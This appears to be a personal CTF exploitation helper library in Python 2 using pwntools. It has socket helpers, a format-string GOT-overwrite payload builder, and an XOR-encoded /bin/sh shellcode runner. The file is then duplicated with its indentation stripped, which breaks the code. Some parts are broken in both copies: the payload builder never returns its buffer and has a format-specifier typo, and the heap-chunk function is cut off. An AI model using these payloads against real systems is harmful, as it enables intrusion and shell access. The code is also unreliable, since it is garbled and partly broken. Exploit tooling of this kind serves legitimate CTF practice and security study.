Mipu94/customlibpwn.py

## customlibpwn.py
import socket
from pwn import *
from struct import pack,unpack
from ctypes import c_int32
import telnetlib
import ctypes
import string
import os

ascii=cs = string.letters+string.punctuation+string.digits+' '
global s

def rand_str(n):
   LIBC = ctypes.cdll.LoadLibrary("./libc.so.6")
   t = LIBC.time(n)
   LIBC.srand(t)
   return LIBC.rand()


def sock(HOST, PORT, debug=True):
                global s
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect( (HOST, PORT) )
                if debug: print "[+] Connected to server"
                return s

def recvu(str,debug=0):
        recv=''
        while not str in recv:
                tmp=s.recv(4096)
                recv+=tmp
                if debug:
                        print tmp
                continue
        return recv

def telnet():
                t = telnetlib.Telnet()
                t.sock = s
                t.interact()

def send(m, debug = False):
                if debug: print "[+] Send:", repr(m)
                s.send(m)
def write_got(system,got_addr,n):
                high = system >> 16
                low = system & 0xFFFF
                start = 8
                if high < low:
                   buf = struct.pack("<I", got_addr+2) + struct.pack("<I", got_addr)+\
                                                  "%" + str(high - start) + "x%"+str(n)+"$hn"+\
                                                  "%" + str(low - high) + "x%"+str(n+1)+"$hn\n"
                else:
                   buf = struct.pack("<I", got_addr) + struct.pack("<I", got_addr+2)+\
                                                  "%" + str(low - start) + "x%"+str(n)+"$hn"+\
                                                  "%" + str(high - low) + "x%"+str(n+1)+"hn\n"

def encodeshell():
        context.clear(arch='i386')
        path = '/bin/cat'
        argv = argv = ['cat','flag.txt']
        envp = {}
        shellcode = asm(shellcraft.i386.linux.sh())
        avoid = '/bin/sh'
        encoded = pwnlib.encoders.i386.xor.encode(shellcode, avoid)
        assert not any(c in encoded for c in avoid)
        print "myshell: ",repr(encoded)
        p = run_shellcode(encoded)
        p.interactive()

def virtual_chunk(save_addr,bit=32):
        chunk=p(0)+p(0)+p(save_addr-3*bit/8)+p(save_addr-2*bit/8)
	import socket
	from pwn import *
	from struct import pack,unpack
	from ctypes import c_int32
	import telnetlib
	import ctypes
	import string
	import os

	ascii=cs = string.letters+string.punctuation+string.digits+' '
	global s

	def rand_str(n):
	LIBC = ctypes.cdll.LoadLibrary("./libc.so.6")
	t = LIBC.time(n)
	LIBC.srand(t)
	return LIBC.rand()


	def sock(HOST, PORT, debug=True):
	global s
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect( (HOST, PORT) )
	if debug: print "[+] Connected to server"
	return s

	def recvu(str,debug=0):
	recv=''
	while not str in recv:
	tmp=s.recv(4096)
	recv+=tmp
	if debug:
	print tmp
	continue
	return recv

	def telnet():
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	def send(m, debug = False):
	if debug: print "[+] Send:", repr(m)
	s.send(m)
	def write_got(system,got_addr,n):
	high = system >> 16
	low = system & 0xFFFF
	start = 8
	if high < low:
	buf = struct.pack("<I", got_addr+2) + struct.pack("<I", got_addr)+\
	"%" + str(high - start) + "x%"+str(n)+"$hn"+\
	"%" + str(low - high) + "x%"+str(n+1)+"$hn\n"
	else:
	buf = struct.pack("<I", got_addr) + struct.pack("<I", got_addr+2)+\
	"%" + str(low - start) + "x%"+str(n)+"$hn"+\
	"%" + str(high - low) + "x%"+str(n+1)+"hn\n"

	def encodeshell():
	context.clear(arch='i386')
	path = '/bin/cat'
	argv = argv = ['cat','flag.txt']
	envp = {}
	shellcode = asm(shellcraft.i386.linux.sh())
	avoid = '/bin/sh'
	encoded = pwnlib.encoders.i386.xor.encode(shellcode, avoid)
	assert not any(c in encoded for c in avoid)
	print "myshell: ",repr(encoded)
	p = run_shellcode(encoded)
	p.interactive()

	def virtual_chunk(save_addr,bit=32):
	chunk=p(0)+p(0)+p(save_addr-3bit/8)+p(save_addr-2bit/8)